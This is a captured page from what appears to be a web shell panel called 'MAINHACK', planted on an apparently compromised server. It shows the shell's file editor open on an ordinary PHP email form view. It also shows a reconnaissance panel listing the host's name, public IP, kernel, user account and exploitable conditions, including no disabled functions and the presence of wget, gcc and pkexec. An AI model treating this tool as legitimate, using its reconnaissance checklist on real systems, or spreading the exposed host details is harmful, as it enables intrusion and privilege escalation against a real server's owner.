[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: send_email.php
<div class="main-content-wrapper"> <?php $title = lang('send') . ' ' . ucfirst($type) . ' ' . lang('email'); ?> <section class="content-header"> <div class="row justify-content-between"> <div class="col-6 p-0"> <h3 class="top-left-header mt-2"><?php echo $title; ?></h3> </div> <?php $this->view('updater/breadcrumb', ['firstSection'=> lang('Email_Setting'), 'secondSection'=> $title])?> </div> </section> <section class="box-wrapper"> <h3 class="display_none"> </h3> <div class="col-md-12"> <!-- general form elements --> <div class="table-box"> <!-- /.box-header --> <!-- form start --> <?php echo form_open(base_url('Email_setting/sendEmail/'.$type)); ?> <div class="box-body"> <div class="row"> <div class="col-md-6"> <?php if($type == "test"){?> <div class="form-group mb-3"> <label><?php echo lang('email'); ?> <span class="required_star">*</span></label> <input autocomplete="off" type="email" name="email" class="form-control" placeholder="<?php echo lang('email'); ?>" value="<?php echo set_value('email');?>"> </div> <?php if (form_error('email')) { ?> <div class="callout callout-danger my-2"> <span class="error_paragraph"><?php echo form_error('email'); ?></span> </div> <?php } ?> <?php } ?> <div class="form-group mb-3"> <label><?php echo lang('message'); ?> <span class="required_star">*</span></label> <textarea class="form-control" name="message" placeholder="<?php echo lang('message'); ?> ..."><?php echo $message; ?></textarea> </div> <?php if (form_error('message')) { ?> <div class="callout callout-danger my-2"> <span class="error_paragraph"><?php echo form_error('message'); ?></span> </div> <?php } ?> <?php if($type == 'customAll'){?> <div class="form-group mb-3"> <?php echo lang('only'); ?> <b><?php echo count($sms_count); ?></b> <?php echo lang('customer_has_valid'); ?> </div> <?php } ?> </div> </div> <!-- /.box-body --> </div> <div class="box-footer"> <button type="submit" name="submit" value="submit" class="btn bg-blue-btn"><?php echo lang('submit'); ?></button> <a href="<?php echo base_url() ?>Email_setting/emailConfiguration" class="btn bg-blue-btn"><?php echo lang('back'); ?> </a> </div> <?php echo form_close(); ?> </div> </div> </section> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002